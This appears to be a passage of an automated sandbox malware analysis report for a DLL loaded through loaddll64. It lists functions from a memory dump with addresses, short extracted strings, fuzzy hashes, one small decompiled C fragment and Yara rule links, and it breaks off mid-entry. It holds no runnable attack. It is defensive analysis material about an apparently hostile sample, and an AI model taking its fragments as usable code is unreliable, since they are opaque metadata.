Opcode Fuzzy Hash: 113bf255f30907f85ca083131261c133160d8791ed09c7962e46f1e4aa7aeec8
Instruction Fuzzy Hash: E141E2B090078E8FDF48CF68C8865DE7BB0FB48358F50461DFC56A6290D3B49664CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002005C Relevance: 2.6, Strings: 2, Instructions: 95COMMON

Download Yara Rule

Strings

(B, xrefs: 000000018002015C
3, xrefs: 0000000180020119

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: (B$3
API String ID: 0-3108688774
Opcode ID: ae8899e9af14a8bd0728e043f2f3e6ee9a39677d1fd67c8acad13cfb8091b350
Instruction ID: 4d52e68c3b5894455c2b855b72f500be9282249362062767deb9202ab9d457a9
Opcode Fuzzy Hash: ae8899e9af14a8bd0728e043f2f3e6ee9a39677d1fd67c8acad13cfb8091b350
Instruction Fuzzy Hash: 2D41B2706087408BE758DF28C18955BBBF1BBC9744F104A1DFA968B3A0DB75D945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001FA08 Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

\I, xrefs: 000000018001FA24
6`, xrefs: 000000018001FAB8

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 6`$\I
API String ID: 0-4113516648
Opcode ID: c820624380164a86f4011e9cac2eee3e4169805a9087f8d545a9fc14e305f8a8
Instruction ID: 87e2cadb684af144f703d936105f11dfb57f24fa6abc88236f5ea505cb77e2af
Opcode Fuzzy Hash: c820624380164a86f4011e9cac2eee3e4169805a9087f8d545a9fc14e305f8a8
Instruction Fuzzy Hash: 4641F77190070D8BDF48DF68C58A5DD7FB0FB483A8F2A621DE80AB6260D7759585CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009144 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

'7, xrefs: 0000000180009152
pr, xrefs: 00000001800091CC

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: '7$pr
API String ID: 0-1984906187
Opcode ID: 056c662d811a8c845d4963eb3dfda1ff298b6ec1510e4f1f57fedda2cc0e9922
Instruction ID: a51af08d5e019336a09e0604cbee0951de86a06f6bb7dc6101bcf2cec172da0b
Opcode Fuzzy Hash: 056c662d811a8c845d4963eb3dfda1ff298b6ec1510e4f1f57fedda2cc0e9922
Instruction Fuzzy Hash: A031C2B05187818BD358CFA8C48A51AFBF5BBC6344F104A1DF9C2866A0D7F5D946CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006880 Relevance: 2.6, Strings: 2, Instructions: 80COMMON

Download Yara Rule

Strings

_D, xrefs: 00000001800068FA
KrTD, xrefs: 000000018000691E

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: KrTD$_D
API String ID: 0-934927992
Opcode ID: e1601d4e70e378c5a6ecebcd8442673b18ca16eef11f20bd0ff53c9d04a0e76b
Instruction ID: 79f0e27b47198620a76255f61a383142c91a704a78014043126b857d0cce2a1e
Opcode Fuzzy Hash: e1601d4e70e378c5a6ecebcd8442673b18ca16eef11f20bd0ff53c9d04a0e76b
Instruction Fuzzy Hash: 54316D716187818BD748DF28C05A42ABBE1FB9D30CF444B1DF8CAA6291D7789615CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C498 Relevance: 2.6, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

V, xrefs: 000000018000C4F9
A%9{, xrefs: 000000018000C57D

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: A%9{$V
API String ID: 0-1820082490
Opcode ID: 625af2db419091958e7d4df6c25d7188c91703984e83660915dca7ebc696b449
Instruction ID: 03f72db5704a5358c6f1172bde4b1415201ccefee93438e503f81867a50f7b44
Opcode Fuzzy Hash: 625af2db419091958e7d4df6c25d7188c91703984e83660915dca7ebc696b449
Instruction Fuzzy Hash: E941A2B180038E8FDF48DF64D8865CE7FF4FB48348F114619E859AA250D3B8D694CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001A1C Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

(, xrefs: 0000000180001A33
>>, xrefs: 0000000180001AD9

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ($>>
API String ID: 0-1145299130
Opcode ID: bfec8586a8ac1bda717ee4d3e998b35be4f018f17ebb2d31d060e621415d9480
Instruction ID: 87f9655775df96d3def6b8efa86b2c726d5a06aaa2b0f8cf4872ed89fb5ea4fb
Opcode Fuzzy Hash: bfec8586a8ac1bda717ee4d3e998b35be4f018f17ebb2d31d060e621415d9480
Instruction Fuzzy Hash: FF31D3B190074E8BDF48CF64C88A1DE7FB0FB58358F24461DE946A6290D3B8D6A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004CA0 Relevance: 2.6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

*!#, xrefs: 0000000180004CBA
mV5, xrefs: 0000000180004D66

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: *!#$mV5
API String ID: 0-2993575305
Opcode ID: 4245992fb973f88090a409a267d2f85edccab32cf52bd4f60c75fea94f1a4a84
Instruction ID: f4257f88e51e2467cedc4a109958e0d61b2de26f6874c0326167d1c9068f5517
Opcode Fuzzy Hash: 4245992fb973f88090a409a267d2f85edccab32cf52bd4f60c75fea94f1a4a84
Instruction Fuzzy Hash: 0931C4B150038E8BDB48CF28C94A5DE7BB0FB58358F014A19FC6696290D7B8D665CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800099EC Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

`{, xrefs: 0000000180009AD7
l^jf, xrefs: 0000000180009A95

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: `{$l^jf
API String ID: 0-1869605660
Opcode ID: 28521cbd4e872c1ef803d1df5e8c14565f9c4bc258fc16fe96f59b7c9f67bd2e
Instruction ID: eb540d20a08f5e40d8c0ff40e11836e8ded1822f40ca17c0ef14950dbd3fc5a0
Opcode Fuzzy Hash: 28521cbd4e872c1ef803d1df5e8c14565f9c4bc258fc16fe96f59b7c9f67bd2e
Instruction Fuzzy Hash: D1317FB162D784AFD388DF28D49591ABBE0FB88354F806A1DF8868B290D775D855CB02

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001F550 Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

2-, xrefs: 000000018001F560
-, xrefs: 000000018001F618

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 2-$-
API String ID: 0-2034864362
Opcode ID: 20bbbdbc3827e50294dde3ee49f0cdd293043f0a077c143f70453fda15f8f7c4
Instruction ID: 4005107032f2b12f9f607655d62483a8781f58ab60f16824121cd48537e79645
Opcode Fuzzy Hash: 20bbbdbc3827e50294dde3ee49f0cdd293043f0a077c143f70453fda15f8f7c4
Instruction Fuzzy Hash: CC317FB190078E8FDF48DF68C84A59A7BB0FB18318F414A1AFC6996254D3B4CA64CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000EAC4 Relevance: 2.6, Strings: 2, Instructions: 61COMMON

Download Yara Rule

Strings

<&, xrefs: 000000018000EB86
q/, xrefs: 000000018000EACC

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: <&$q/
API String ID: 0-2233190826
Opcode ID: 15a5214ead44a1f0762e7863b7fdc3010a0d9091678656a87e304455b9a574ab
Instruction ID: 34f360e2f025a71cd2e5aa73a3d426e5d18a321659368207a0a8d8f01dd344ad
Opcode Fuzzy Hash: 15a5214ead44a1f0762e7863b7fdc3010a0d9091678656a87e304455b9a574ab
Instruction Fuzzy Hash: EE319CB0508B888BE759DF25C48A50BBBF2FBC5788F200A1DF292867A0D775D549CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011664 Relevance: 2.6, Strings: 2, Instructions: 57COMMON

Download Yara Rule

Strings

g%, xrefs: 0000000180011703
?P>, xrefs: 00000001800116D2

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ?P>$g%
API String ID: 0-4203485977
Opcode ID: e7f509d9a25edf16b23a548fc7fe81b9e6bc0ab59227e88e5feb3085b6c3579d
Instruction ID: 717686fd7735f49e019bed61dd90445519292eacbbe0b0eb12e200a6e4bac1a5
Opcode Fuzzy Hash: e7f509d9a25edf16b23a548fc7fe81b9e6bc0ab59227e88e5feb3085b6c3579d
Instruction Fuzzy Hash: 2731B2B090438E8FDB44DF64D88A6DF7BB0FB58348F104A19EC6996250D3B8D664CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800079D8 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

Ts, xrefs: 0000000180007A84
"X,h, xrefs: 0000000180007AA5

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: "X,h$Ts
API String ID: 0-4155455058
Opcode ID: 217a8b3ebbc510d3abab149b4def833290e522513fd0b99837b1368bb75def2b
Instruction ID: 78e44bf7acd730168ef7454480584198ea74db249acf4ebf7474d583245c3fc9
Opcode Fuzzy Hash: 217a8b3ebbc510d3abab149b4def833290e522513fd0b99837b1368bb75def2b
Instruction Fuzzy Hash: 7D215DB0529785ABD398DF28D08991EBBE0BBC4308F806A1DF8858A350D7B4D548CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800199E8 Relevance: 2.2, Strings: 1, Instructions: 936COMMON

Download Yara Rule

Strings

Mbqz, xrefs: 000000018001ADD0

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Mbqz
API String ID: 0-2241695783
Opcode ID: c7e5bd259350cc8d432e2e418653ef11db78de1d8ea4b143f2c3ed3acbc8f7f6
Instruction ID: 750b1e4ffae553eb56a080148391b3b5c453ff61d810ae7c75f6761a4f8562eb
Opcode Fuzzy Hash: c7e5bd259350cc8d432e2e418653ef11db78de1d8ea4b143f2c3ed3acbc8f7f6
Instruction Fuzzy Hash: 6BB23CB552568D8FDBBADF28C8A97D93BE5FB5C304F00422ADC0ACA260E7749755CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FC334 Relevance: 1.6, APIs: 1, Instructions: 150
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00007FFA7FFA094FC334(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
				signed long long _t25;
				void* _t27;
				void* _t30;

				 *((long long*)(_t30 + 8)) = __rbx;
				 *(_t30 + 0x10) = _t25;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				_t27 = (_t25 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rcx + _t27)) != sil) goto 0x94fc362;
				if (_t27 + __rdx -  !__r8 <= 0) goto 0x94fc39e;
				return __rdx + 0xb;
			}

0x7ffa094fc334
0x7ffa094fc339
0x7ffa094fc33e
0x7ffa094fc362
0x7ffa094fc369
0x7ffa094fc37c
0x7ffa094fc39d

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3dbb0acb19b1786796477eb2973993dd2a31b244324abc6045056baec5c30e6
Instruction ID: af8a8e9dbb22651353ea11586f72ac72bd25f7805c3c25ba0c217a35a7f31aa2
Opcode Fuzzy Hash: c3dbb0acb19b1786796477eb2973993dd2a31b244324abc6045056baec5c30e6
Instruction Fuzzy Hash: 9C51F522B08A9285FB209F72B8545AE7BA1FB4ABD4F148135EE9C67B95CF3DD011C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A1D4 Relevance: 1.6, Strings: 1, Instructions: 350COMMON

Download Yara Rule

Strings

m1, xrefs: 000000018000A283

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: m1
API String ID: 0-128121454
Opcode ID: 16691c6ba2deddaf6de1f0e0d1ff2ca3acd048d37c77c35f5dce586baf0938cf
Instruction ID: 5f51607b613c9aae9948664f2987d724fcb5cf1c05a1f438c657f6daf5c41e3f
Opcode Fuzzy Hash: 16691c6ba2deddaf6de1f0e0d1ff2ca3acd048d37c77c35f5dce586baf0938cf
Instruction Fuzzy Hash: 29F11770A04709EFDB58DF68C04A69EBBF2FB48344F40C16DE84AEB290D7759A59CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180012244 Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

>, xrefs: 00000001800126FC

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >
API String ID: 0-4048615937
Opcode ID: 35f082249332f6d240efb6a3c148916e58dc78f6fac7b8448015639dc79bfce0
Instruction ID: b0185e3000dff54f49d8606eba530083518bcd1c244eb05af1b54d96feabf3c3
Opcode Fuzzy Hash: 35f082249332f6d240efb6a3c148916e58dc78f6fac7b8448015639dc79bfce0
Instruction Fuzzy Hash: 33D14A715047888BDBF9CF24C88A7D97BE1FB89304F50861DE88ECA291DB749659CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017BF8 Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

k |P, xrefs: 0000000180017C97

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: k |P
API String ID: 0-500141808
Opcode ID: 1aac0f1d3442458b59664808ae9574f9abf7ab878da11c77e58f892187b88b3f
Instruction ID: bdb77ffc642b3299673720cbbe7adc6e022f36649dc5c9d605d8e1814f76fd65
Opcode Fuzzy Hash: 1aac0f1d3442458b59664808ae9574f9abf7ab878da11c77e58f892187b88b3f
Instruction Fuzzy Hash: 28913B30E0061DDBEF69CFA9E8896DDB7B1FB44344F40822DE416A72A1DB74994ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019230 Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

{?, xrefs: 00000001800194A9

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: {?
API String ID: 0-3906500937
Opcode ID: 2d540e23551ce5f958f4764bec98e9519d494356363efa56796c0522d6c48830
Instruction ID: 7643702d073ff4940ecce4f9a509df35797120a70f9b1d87fbff4b68fa84022d
Opcode Fuzzy Hash: 2d540e23551ce5f958f4764bec98e9519d494356363efa56796c0522d6c48830
Instruction Fuzzy Hash: 90B157B590070DCFEB98CF68C18A9DD3BA9FB15358F404129FC0E96290D7B9E919CB52

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000AE84 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

XU, xrefs: 000000018000AFE4

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: XU
API String ID: 0-683303128
Opcode ID: e071b3a0d50c9461b57229d15226e783a6e60c7e98d42caa5a907250e51fd640
Instruction ID: 425e58cadb221d331942f6c121d336e4e4e9b3bb556196463e5803c943499b9b
Opcode Fuzzy Hash: e071b3a0d50c9461b57229d15226e783a6e60c7e98d42caa5a907250e51fd640
Instruction Fuzzy Hash: 10613B70D14608DBEB9CDFA4E8896DDBBB1FB48344F10812DE816E72A1DB749A49CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009298 Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

F'K, xrefs: 00000001800094BB

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: F'K
API String ID: 0-2963079709
Opcode ID: 713e8163358f3e4ccf3a322240c7036fe92718bea1a19a215dd26039f06aebda
Instruction ID: 3cdbfef3d71ad5117e50a41d4a808b16c297a78b625f2c46d5022480677e20ff
Opcode Fuzzy Hash: 713e8163358f3e4ccf3a322240c7036fe92718bea1a19a215dd26039f06aebda
Instruction Fuzzy Hash: C481A5749043888BDBB9DF68C8897DDBBB0FB48348F20411EDC5AAB291DBB45685CF41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001C974 Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

Gh, xrefs: 000000018001CB06

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Gh
API String ID: 0-277699601
Opcode ID: 7940fb094068dd5baf5e4535b0b949c1577390b24490b32456d4c9773adc2951
Instruction ID: 49f89991b7669aef05847bf6ac8085ae3f2e5bccc0c70176600d3bb48f89c730
Opcode Fuzzy Hash: 7940fb094068dd5baf5e4535b0b949c1577390b24490b32456d4c9773adc2951
Instruction Fuzzy Hash: A2512670614B48ABDBC9DE28C4C669D3FE1FB483A8FA06028FC4786295D774D4C5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001660 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

KdW, xrefs: 000000018000170C

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: KdW
API String ID: 0-1553299040
Opcode ID: 3dbde57a559d0e97d3426f0fe397d2413bb4c768266781bd1ea48c4852796dec
Instruction ID: 07466cbb68b99a3b5ba183136cc33729b20d4f14bf8bba25a53fc7287070b877
Opcode Fuzzy Hash: 3dbde57a559d0e97d3426f0fe397d2413bb4c768266781bd1ea48c4852796dec
Instruction Fuzzy Hash: 17619EB090074A8BDF48CF28C49A59E7FB1FB68398F60421DFC5696290D374DAA5CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024098 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

>, xrefs: 000000018002413F

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >
API String ID: 0-260571596
Opcode ID: 52da228a42332ba98b714843feb8a4ffa7a865caa0d47f3da51bcc1adbe3605a
Instruction ID: 46fc6c4e0ac0a664899e95d82bf5bf8fb1e46c637e697bbd607199efc3ac47d3
Opcode Fuzzy Hash: 52da228a42332ba98b714843feb8a4ffa7a865caa0d47f3da51bcc1adbe3605a
Instruction Fuzzy Hash: E351187090070E8FDF48DF68C48A5DE7FB0FB58398F255219E80AA6260C7789695CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018D0C Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

e#y, xrefs: 0000000180018DF8

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: e#y
API String ID: 0-1553523250
Opcode ID: 7cfc1742122b5da270b1305c98699770b0d8300b0d29b437b0f5bbbb71ff1cdb
Instruction ID: 8922a9c917ecf92f84784f2c0912e7afb41abd4682f2986cf207ea24a7e27a88
Opcode Fuzzy Hash: 7cfc1742122b5da270b1305c98699770b0d8300b0d29b437b0f5bbbb71ff1cdb
Instruction Fuzzy Hash: 4451C0B090034A8BDB48DF24C49A4DE7FB1BB68394F60461DEC56AA290D37896A5CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002748C Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

;Qe+, xrefs: 0000000180027515

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ;Qe+
API String ID: 0-3743842969
Opcode ID: abc73cde212dc252b0e5d03e266be842b85d1299fa2b3d615a0caa319cbc98b6
Instruction ID: 2891cc472bdff435687e8dc78c7f584053815dc88c3a0ad3e69441950bb252b7
Opcode Fuzzy Hash: abc73cde212dc252b0e5d03e266be842b85d1299fa2b3d615a0caa319cbc98b6
Instruction Fuzzy Hash: FB51B3B190074A8BDB48CF68C49A5DE7FB0BB68398F114229EC5696250D374DAA5CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800069C0 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

,', xrefs: 0000000180006AFA

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ,'
API String ID: 0-3722628154
Opcode ID: fb5c24a2de7b785ef7d1522db3a7cd1fc0c6d32909dcdfd4e7ef4007326c169e
Instruction ID: 8bcc0ae8ca8a44d8cc4a64df71be4da37ed53fd059e3607e1506b6ed9a83d4bd
Opcode Fuzzy Hash: fb5c24a2de7b785ef7d1522db3a7cd1fc0c6d32909dcdfd4e7ef4007326c169e
Instruction Fuzzy Hash: 9C51E3B091074A8FDB48CF68C9865DE7FB0FB68394F10421DEC5AA6290D37496A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000F174 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

;qct, xrefs: 000000018000F2B3

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ;qct
API String ID: 0-1256533914
Opcode ID: 7e5896647748426d00c93f1e327efcd977346de81977c4c15da4b7b9c787c365
Instruction ID: 5c1d59b2199d0d85db2571b197c7ca3ede17e59358e5629c23b069c973ffe58b
Opcode Fuzzy Hash: 7e5896647748426d00c93f1e327efcd977346de81977c4c15da4b7b9c787c365
Instruction Fuzzy Hash: B741E27051078D8BDB49CF68C88A4DE7BA0FB4835CF155619FC8AA6260D3B8D585CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009BEC Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

%[, xrefs: 0000000180009CD2

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %[
API String ID: 0-3862537531
Opcode ID: f1dc08e8e3e3301475fb70ff4cfa84bb86d735aa649ff25d3a10773117e6cde7
Instruction ID: 6a4ad4b0db03769040014b30bff45f2a66b5b8118bf8a9f7d20fa3eb207c29ac
Opcode Fuzzy Hash: f1dc08e8e3e3301475fb70ff4cfa84bb86d735aa649ff25d3a10773117e6cde7
Instruction Fuzzy Hash: 6E31D6B150478A8BDB4CDF68D8565AE3BB1FB48304F004A2DFD26DB390D7B49624CB94

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002629C Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

Wn, xrefs: 00000001800263A2

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Wn
API String ID: 0-506041651
Opcode ID: 571cac09fbe3685261a59c499fbd8c80fdf8cf6d47964e918e1805a2c447958a
Instruction ID: 81acd842a4d7b99bb8f16045e05b91d2bb3390d65dcb5750e05b0634c9df5c42
Opcode Fuzzy Hash: 571cac09fbe3685261a59c499fbd8c80fdf8cf6d47964e918e1805a2c447958a
Instruction Fuzzy Hash: 5F41D4B050078A8FDF48CF68D89A5DE7BB1FB48348F104A2CEC6696290D3B4D664CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002834 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

"p, xrefs: 00000001800028A3

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: "p
API String ID: 0-3060671971
Opcode ID: ae29b2ab0911a73132ecede333d1ad00ec6016c3b77c06c2e3197b8238caa4ac
